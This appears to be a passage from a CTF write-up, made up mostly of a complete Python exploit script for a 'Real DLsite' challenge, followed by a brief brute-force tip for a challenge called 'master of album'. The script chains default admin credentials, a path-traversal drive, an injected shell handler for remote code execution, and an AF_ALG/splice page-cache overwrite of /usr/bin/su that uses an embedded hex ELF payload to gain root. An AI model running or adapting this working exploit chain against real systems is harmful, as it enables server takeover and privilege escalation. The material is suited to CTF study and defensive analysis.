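 e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum,
 e_shstrndx) = ELF64_HEADER.unpack(bytes.fromhex(HEADER_HEX))

print("magic:", e_ident[:4])
print("type:", e_type, "machine:", e_machine)
print("entry:", hex(e_entry), "program headers:", e_phnum)
```

Type 2 is ET_EXEC and machine 62 is x86-64, so the blob is a static executable with a single program header and its entry point right after the headers.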
EXP:
#!/usr/bin/env python3
import argparse
import json
import time
import urllib.error
import urllib.parse
import urllib.request
DEFAULT_USER = "admin"
DEFAULT_PASSWORD = "123456"
ROOTISH = "rootish"
BOOM = "boom"
CMD_PATH = f"{ROOTISH}/tmp/cmd.txt"
THUMB_MAPPING = f"pwn:{ROOTISH}/tmp/*.txt"
# Minimal ELF executed as root by cron's `su` call.
# Behavior:
# /bin/sh -c 'cat /root/0-0/flag>/app/data/local/test/f;chmod 644 /app/data/local/test/f'
ROOT_WRITER_ELF_HEX = (
"7f454c4602010100000000000000000002003e00010000007800400000000000"
"4000000000000000300100000000000000000000400038000100400003000200"
"0100000007000000780000000000000078004000000000007800400000000000"
"a000000000000000a00000000000000008000000000000004831d2488d357600"
"0000488d3d1500000048c7c03b0000000f054831ff48c7c03c0000000f052f62"
"696e2f7368002d6300636174202f726f6f742f302d302f666c61673e2f617070"
"2f646174612f6c6f63616c2f746573742f663b63686d6f6420363434202f6170"
"702f646174612f6c6f63616c2f746573742f6600900f1f009e00400000000000"
"a600400000000000a9004000000000000000000000000000002e736873747274"
"6162002e74657874000000000000000000000000000000000000000000000000"
"0000000000000000000000000000000000000000000000000000000000000000"
"0000000000000000000000000b00000001000000070000000000000078004000"
"000000007800000000000000a000000000000000000000000000000008000000"
"0000000000000000000000000100000003000000000000000000000000000000"
"0000000018010000000000001100000000000000000000000000000001000000"
"000000000000000000000000"
)
EVIL_SCRIPT = r"""/// <reference path="./scripts/env/drive.d.ts"/>
defineCreate(function (ctx, config, utils) {
return {
meta: function (ctx) { return {}; },
get: function (ctx, path) {
if (path === '' || path === '/') {
return { Path: '', IsDir: true, Size: -1, ModTime: Date.now() };
}
if (path !== 'x.txt' && path !== '/x.txt') throw ErrNotFound();
return { Path: 'x.txt', IsDir: false, Size: 1, ModTime: Date.now(), Meta: { Readable: true, Writable: false } };
},
list: function (ctx, path) {
return [this.get(ctx, 'x.txt')];
},
getReader: function (ctx, entry, start, size) {
return 123;
}
};
});
"""
SHELL_HANDLER_BLOCK = """ - type: shell
tags: pwn
file-types: txt
config:
shell: /bin/sh
mime-type: text/plain
write-content: "1"
max-size: "-1"
timeout: 10m
"""
COPY_FAIL_PATCH_CMD = r"""
python3 - <<'PY'
import os
import socket

hexs = """ + repr(ROOT_WRITER_ELF_HEX) + r"""
blob = bytes.fromhex(hexs)

def d(x):
    return bytes.fromhex(x)

def poke(path, blob):
    fd = os.open(path, 0)
    h = 279  # SOL_ALG
    # Patch the target four bytes at a time.
    for off in range(0, len(blob), 4):
        c = blob[off:off + 4]
        a = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
        a.setsockopt(h, 1, d("0800010000000010" + "0" * 64))
        a.setsockopt(h, 5, None, 4)
        u, _ = a.accept()
        z = b"\x00"
        u.sendmsg(
            [b"A" * 4 + c],
            [(h, 3, z * 4), (h, 2, b"\x10" + z * 19), (h, 4, b"\x08" + z * 3)],
            32768,
        )
        r, w = os.pipe()
        os.splice(fd, w, off + 4, offset_src=0)
        os.splice(r, u.fileno(), off + 4)
        try:
            u.recv(8 + off)
        except Exception:
            pass
    print("PATCHED_SU", len(blob), flush=True)

poke("/usr/bin/su", blob)
PY
"""
def normalize_base(base):
    base = base.rstrip("/")
    if base.endswith("/new"):
        api_base = base
        root_base = base[:-4]
    else:
        api_base = base + "/new"
        root_base = base
    return api_base, root_base


class Exploit:
    def __init__(self, api_base, root_base, user, password, verbose=True):
        self.api_base = api_base
        self.root_base = root_base
        self.user = user
        self.password = password
        self.token = None
        self.verbose = verbose

    def log(self, *parts):
        if self.verbose:
            print("[*]", *parts, flush=True)

    def req(self, path, method="GET", data=None, headers=None, timeout=30):
        if headers is None:
            headers = {}
        if data is not None and not isinstance(data, (bytes, bytearray)):
            data = data.encode()
        r = urllib.request.Request(self.api_base + path, data=data, headers=headers, method=method)
        try:
            with urllib.request.urlopen(r, timeout=timeout) as resp:
                return resp.read().decode("utf-8", "ignore"), resp.status
        except urllib.error.HTTPError as e:
            return e.read().decode("utf-8", "ignore"), e.code

    def api(self, path, method="GET", data=None, ctype="application/json", timeout=30):
        headers = {"Authorization": self.token}
        if data is not None:
            headers["Content-Type"] = ctype
        if ctype == "application/json" and data is not None and not isinstance(data, str):
            data = json.dumps(data)
        return self.req(path, method=method, data=data, headers=headers, timeout=timeout)
    def auth(self):
        last_err = None
        for attempt in range(10):
            self.log(f"initializing token, attempt {attempt + 1}")
            body, status = self.req("/auth/init", method="POST")
            if status != 200 or not body.strip():
                last_err = f"/auth/init failed: HTTP {status} {body!r}"
                time.sleep(1)
                continue
            try:
                self.token = json.loads(body)["token"]
            except Exception as e:
                last_err = f"/auth/init response could not be parsed: {body!r} ({e})"
                time.sleep(1)
                continue
            self.log("logging in to the go-drive admin console")
            body, status = self.req(
                "/auth/login",
                method="POST",
                data=json.dumps({"username": self.user, "password": self.password}),
                headers={"Authorization": self.token, "Content-Type": "application/json"},
            )
            if status == 200:
                return
            last_err = f"login failed: HTTP {status} {body}"
            time.sleep(1)
        raise RuntimeError(last_err or "authentication failed")

    def get_entry(self, path):
        body, status = self.api("/entry/" + path)
        if status != 200:
            raise RuntimeError(f"failed to get entry: {path} -> HTTP {status} {body}")
        return json.loads(body)

    def get_content(self, path):
        entry = self.get_entry(path)
        key = entry["meta"]["accessKey"]
        body, status = self.req("/content/" + path + "?_k=" + urllib.parse.quote(key, safe=""))
        if status != 200:
            raise RuntimeError(f"failed to read content: {path} -> HTTP {status} {body}")
        return body

    def save_file(self, path, content):
        # Write a file through the admin script-eval job using drive.Save.
        js = f"""
var tf = newTempFile();
tf.Write(newBytes({json.dumps(content)}));
tf.SeekTo(0, SEEK_START);
var ctx = newTaskCtx(newContext());
var e = drive.Save(ctx, {json.dumps(path)}, tf.Size(), true, tf);
log('saved=' + e.Path());
"""
        body, status = self.api("/admin/jobs/script-eval", method="POST", data=js, ctype="text/plain", timeout=60)
        if status != 200:
            raise RuntimeError(f"failed to write file: {path} -> HTTP {status} {body}")
        return body
    def ensure_rootish(self):
        self.log("making sure the rootish drive exists")
        desired = {
            "name": ROOTISH,
            "enabled": True,
            "type": "fs",
            "config": "{\"path\":\"../../../../\"}",
        }
        self.api("/admin/drive", method="POST", data=desired)
        self.api(f"/admin/drive/{ROOTISH}", method="PUT", data=desired)
        self.api(f"/admin/drive/{ROOTISH}/init-config", method="POST")
        self.api(f"/admin/drive/{ROOTISH}/init", method="POST", data="{}", ctype="application/json")
        self.api("/admin/drives/reload", method="POST", data="{}", ctype="application/json")
        self.get_entry(f"{ROOTISH}/app/config.yml")

    def ensure_shell_handler(self):
        self.log("injecting the shell thumbnail handler")
        cfg_path = f"{ROOTISH}/app/config.yml"
        cfg = self.get_content(cfg_path)
        if "type: shell\n tags: pwn" not in cfg:
            marker = " # padding: 10\n"
            if marker not in cfg:
                raise RuntimeError("config insertion point not found; the config.yml format may have changed")
            cfg = cfg.replace(marker, marker + SHELL_HANDLER_BLOCK, 1)
            # Keep a backup of the original before overwriting it.
            self.save_file(f"{ROOTISH}/app/config.yml.bak.exp", self.get_content(cfg_path))
            self.save_file(cfg_path, cfg)
        self.log("setting handlersMapping")
        body, status = self.api(
            "/admin/options",
            method="PUT",
            data={"thumbnail.handlersMapping": THUMB_MAPPING},
        )
        if status != 200:
            raise RuntimeError(f"failed to write options: HTTP {status} {body}")

    def ensure_boom(self):
        self.log("writing the evil script drive")
        self.save_file(f"{ROOTISH}/app/data/script-drives/evil.js", EVIL_SCRIPT)
        desired = {
            "name": BOOM,
            "enabled": True,
            "type": "script",
            "config": "{\"script\":\"evil\"}",
        }
        self.api("/admin/drive", method="POST", data=desired)
        self.api(f"/admin/drive/{BOOM}", method="PUT", data=desired)
        self.api(f"/admin/drive/{BOOM}/init-config", method="POST")
        self.api(f"/admin/drive/{BOOM}/init", method="POST", data="{}", ctype="application/json")
        self.api("/admin/drives/reload", method="POST", data="{}", ctype="application/json")
        self.get_entry(f"{BOOM}/x.txt")

    def trigger_restart(self):
        self.log("requesting the boom thumbnail to force a go-drive restart")
        entry = self.get_entry(f"{BOOM}/x.txt")
        key = entry["meta"]["accessKey"]
        self.req("/thumbnail/" + f"{BOOM}/x.txt" + "?_k=" + urllib.parse.quote(key, safe=""), timeout=10)
        self.wait_service_back()

    def wait_service_back(self):
        self.log("waiting for go-drive to come back")
        for _ in range(15):
            try:
                self.auth()
                return
            except Exception:
                time.sleep(1)
        raise RuntimeError("go-drive did not come back in time")

    def shell_cmd(self, cmd):
        self.save_file(CMD_PATH, cmd.rstrip("\n") + "\n")
        entry = self.get_entry(CMD_PATH)
        key = entry["meta"]["accessKey"]
        body, status = self.req("/thumbnail/" + CMD_PATH + "?_k=" + urllib.parse.quote(key, safe=""), timeout=120)
        return body, status

    def verify_rce(self):
        self.log("verifying shell RCE as app")
        body, status = self.shell_cmd("whoami\nid\npwd")
        if status != 200 or "uid=" not in body:
            raise RuntimeError(f"RCE verification failed: HTTP {status} {body}")
        self.log("RCE OK")

    def patch_su_pagecache(self):
        self.log("overwriting the /usr/bin/su page cache with the copy.fail technique")
        body, status = self.shell_cmd(COPY_FAIL_PATCH_CMD)
        if status != 200 or "PATCHED_SU" not in body:
            raise RuntimeError(f"copy.fail patch failed: HTTP {status} {body}")
    def poll_flag(self, timeout=420, interval=5):
        self.log("polling /ancient/f until the root cron job drops the flag")
        deadline = time.time() + timeout
        urls = [
            self.root_base + "/ancient/f",
            self.root_base + "/data/f",
        ]
        while time.time() < deadline:
            for url in urls:
                try:
                    with urllib.request.urlopen(url, timeout=10) as resp:
                        body = resp.read().decode("utf-8", "ignore")
                    text = body.strip()
                    if "flag{" in text.lower() or "actf{" in text.lower():
                        return text
                    if text and "File Download Service" not in text and "<html" not in text.lower():
                        return text
                except Exception:
                    pass
            time.sleep(interval)
        raise RuntimeError("polling timed out; the flag has not appeared yet")


def main():
    parser = argparse.ArgumentParser(description="Exploit Real DLsite and print the flag")
    parser.add_argument("--base", required=True, help="base URL, e.g. http://host:port or http://host:port/new")
    parser.add_argument("--user", default=DEFAULT_USER)
    parser.add_argument("--password", default=DEFAULT_PASSWORD)
    parser.add_argument("--timeout", type=int, default=420, help="flag polling timeout in seconds")
    args = parser.parse_args()
    api_base, root_base = normalize_base(args.base)
    exp = Exploit(api_base, root_base, args.user, args.password)
    exp.auth()
    exp.ensure_rootish()
    exp.ensure_shell_handler()
    exp.ensure_boom()
    exp.trigger_restart()
    exp.verify_rce()
    exp.patch_su_pagecache()
    flag = exp.poll_flag(timeout=args.timeout)
    print(flag)


if __name__ == "__main__":
    main()
master of album
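The websocket has no authentication, so it can be driven with an arbitrary token, and the challenge uses a static flag.
That means unlimited attempts: keep trying and it will fall eventually.
Alternatively, have an AI write a script to crawl the question bank.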